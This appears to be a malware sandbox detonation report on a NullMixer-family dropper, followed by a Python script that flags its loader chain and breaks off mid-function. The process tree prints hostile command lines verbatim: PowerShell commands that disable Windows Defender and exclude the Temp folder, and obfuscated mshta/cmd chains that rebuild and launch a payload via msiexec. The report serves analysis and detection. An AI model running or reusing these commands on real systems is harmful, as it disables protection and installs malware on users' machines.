| SHA512 | fcfbadec9f73975301ab404db6b09d31457fac7ccad2fa5be348e1cad6800f87cb5b56de50880c55bbadb3c40423351a6b5c2d03f6a327d898e35f517b1c628c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\ml\messages.json
| MD5 | 4717efe4651f94eff6acb6653e868d1a |
| SHA1 | b8a7703152767fbe1819808876d09d9cc1c44450 |
| SHA256 | 22ca9415e294d9c3ec3384b9d08cdaf5164af73b4e4c251559e09e529c843ea6 |
| SHA512 | 487eab4938f6bc47b1d77dd47a5e2a389b94e01d29849e38e96c95cabc7bd98679451f0e22d3fea25c045558cd69fddb6c4fef7c581141f1c53c4aa17578d7f7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\mn\messages.json
| MD5 | 83e7a14b7fc60d4c66bf313c8a2bef0b |
| SHA1 | 1ccf1d79cded5d65439266db58480089cc110b18 |
| SHA256 | 613d8751f6cc9d3fa319f4b7ea8b2bd3bed37fd077482ca825929dd7c12a69a8 |
| SHA512 | 3742e24ffc4b5283e6ee496813c1bdc6835630d006e8647d427c3de8b8e7bf814201adf9a27bfab3abd130b6fec64ebb102ac0eb8dedfe7b63d82d3e1233305d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\mr\messages.json
| MD5 | 3b98c4ed8874a160c3789fead5553cfa |
| SHA1 | 5550d0ec548335293d962aaa96b6443dd8abb9f6 |
| SHA256 | adeb082a9c754dfd5a9d47340a3ddcc19bf9c7efa6e629a2f1796305f1c9a66f |
| SHA512 | 5139b6c6df9459c7b5cdc08a98348891499408cd75b46519ba3ac29e99aaafcc5911a1dee6c3a57e3413dbd0fae72d7cbc676027248dce6364377982b5ce4151 |
Analysis: behavioral22
Detonation Overview
| Field | Value |
| Submitted | 2024-11-10 17:24 |
| Reported | 2024-11-10 17:27 |
| Platform | win10v2004-20241007-en |
| Max time kernel | 79s |
| Max time network | 153s |
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-OR7RH.tmp\Wed067fa7edd4b875a.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4060 set thread context of 1360 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe |
| PID 5068 set thread context of 864 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068cfd71e196da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-OR7RH.tmp\Wed067fa7edd4b875a.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0625413f2fb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062a0488e6dd1.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0625413f2fb.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe
"C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed067ba5199af5f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed067fa7edd4b875a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06d8092a5ae.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0639114ac9fa.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed068cfd71e196da.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed068a6c101a0e81.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed062a0488e6dd1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06384ea2548.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0625413f2fb.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed062272ee8a02b1746.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06dffacb42ccf1c.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe
Wed067ba5199af5f.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe
Wed067fa7edd4b875a.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe
Wed06d8092a5ae.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe
Wed0639114ac9fa.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068cfd71e196da.exe
Wed068cfd71e196da.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062a0488e6dd1.exe
Wed062a0488e6dd1.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0625413f2fb.exe
Wed0625413f2fb.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe
Wed062272ee8a02b1746.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06384ea2548.exe
Wed06384ea2548.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe
Wed06dffacb42ccf1c.exe
C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp
"C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp" /SL5="$401EC,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4908 -ip 4908
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3712 -ip 3712
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 588
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 356
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct( "WSCrIpT.ShELl").RuN ("cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF """"=="""" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe"" ) do taskkill /F /im ""%~NXm"" " ,0,true ))
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe
"C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\is-OR7RH.tmp\Wed067fa7edd4b875a.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OR7RH.tmp\Wed067fa7edd4b875a.tmp" /SL5="$7002E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe" 05XkvF6f.EXe&&stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF ""=="" for %m In ( "C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe" ) do taskkill /F /im "%~NXm"
C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe
05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /im "Wed062272ee8a02b1746.exe"
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct( "WSCrIpT.ShELl").RuN ("cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF ""/PttJqbtIGV_gKpayWgLcpQuUGXL9h""=="""" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" ) do taskkill /F /im ""%~NXm"" " ,0,true ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" 05XkvF6f.EXe&&stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF "/PttJqbtIGV_gKpayWgLcpQuUGXL9h"=="" for %m In ( "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" ) do taskkill /F /im "%~NXm"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: ClOse ( cReateobJecT( "wScriPT.shEll" ). Run("C:\Windows\system32\cmd.exe /q /C Echo | sEt /P = ""MZ"" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS+ ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n &STart msiexec -y .\M9WDkH25.n " ,0, TrUe))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C Echo | sEt /P = "MZ" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS+ ZSPELY.cNM + OJM3YR.X+ SVnzW.C2+ AmtZY.zXT+ LPME79O.f1+ NytFSko.4 m9WDKH25.n &STart msiexec -y .\M9WDkH25.n
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Echo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>X5W6AA.ZS"
C:\Windows\SysWOW64\msiexec.exe
msiexec -y .\M9WDkH25.n
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
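The mshta, cmd and msiexec command lines above are one chain: mshta runs inline VBScript, that script runs cmd, cmd writes a two-byte "MZ" stub with `echo | set /p`, appends seven dropped chunks to it with `copy /b`, and hands the result to `msiexec -y`, which calls the module's DllRegisterServer export regardless of the file extension. The randomised casing (sEt /P, CoPY, STart) defeats naive string matching. The Python below is an added triage example, not part of this report or of any sandbox's code: it runs case-insensitive rules over process command lines, recovers the chunk order and output name from the `copy /b` expression, and flags `msiexec -y` on a non-.dll path. The command lines it checks are copies typed in from the list above plus one benign line; the rule names are illustrative.

```python
import re

# Constructed sample process command lines, modelled on the mshta -> cmd ->
# msiexec chain in the process tree above plus one benign line. They are
# copies typed in for this example, not records pulled from the sandbox.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct( "WSCrIpT.ShELl").RuN ("cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF """"=="""" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe"" ) do taskkill /F /im ""%~NXm"" " ,0,true ))',
    r'"C:\Windows\system32\cmd.exe" /q /C Echo | sEt /P = "MZ" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS+ ZSPELY.cNM + OJM3YR.X+ SVnzW.C2+ AmtZY.zXT+ LPME79O.f1+ NytFSko.4 m9WDKH25.n &STart msiexec -y .\M9WDkH25.n',
    r'msiexec -y .\M9WDkH25.n',
    r'"C:\Windows\System32\cmd.exe" /c dir C:\Users\Admin',
]

# Rule names are illustrative. IGNORECASE defeats the random casing the
# loader uses; the capture group, where present, is the detail an analyst
# wants to see next to the rule name.
RULES = [
    ("mshta_inline_script",             # script: protocol handler, no .hta on disk
     re.compile(r'mshta(?:\.exe)?"?\s+(?:vbscript|javascript):', re.I)),
    ("mz_header_via_set_p",             # `echo | set /p ="MZ" >file` writes a 2-byte DOS header stub
     re.compile(r'set\s+/p\s*=\s*"MZ"\s*>\s*(\S+)', re.I)),
    ("copy_b_chunk_reassembly",         # binary-mode concatenation of dropped chunks
     re.compile(r'copy\s+/b\b', re.I)),
    ("msiexec_y_dll_register",          # msiexec -y <file> calls the file's DllRegisterServer
     re.compile(r'msiexec(?:\.exe)?"?\s+[-/]y\s+(\S+)', re.I)),
    ("taskkill_parent_cleanup",         # kills the original dropper after copying it elsewhere
     re.compile(r'taskkill\s+/f\s+/im\s+"*%~nx', re.I)),
]

COPY_B = re.compile(r'copy\s+/b\s+(?:/y\s+)?([^&|]+)', re.I)


def extract_reassembly(cmdline):
    """Return (chunk_files, output_file) for a `copy /b a+b+c out` expression, else None."""
    m = COPY_B.search(cmdline)
    if not m:
        return None
    parts = m.group(1).strip().rsplit(None, 1)
    if len(parts) != 2:
        return None
    chunk_expr, output = parts
    chunks = [c.strip() for c in chunk_expr.split("+") if c.strip()]
    return chunks, output


def triage(cmdline):
    """Return [(rule_name, detail)] for one process command line, in rule order."""
    hits = []
    for name, rx in RULES:
        m = rx.search(cmdline)
        if not m:
            continue
        detail = m.group(1) if m.groups() else m.group(0)
        if name == "msiexec_y_dll_register":
            # Registering a real .dll is unusual but legitimate; a DLL hiding
            # behind a random extension is what this chain does.
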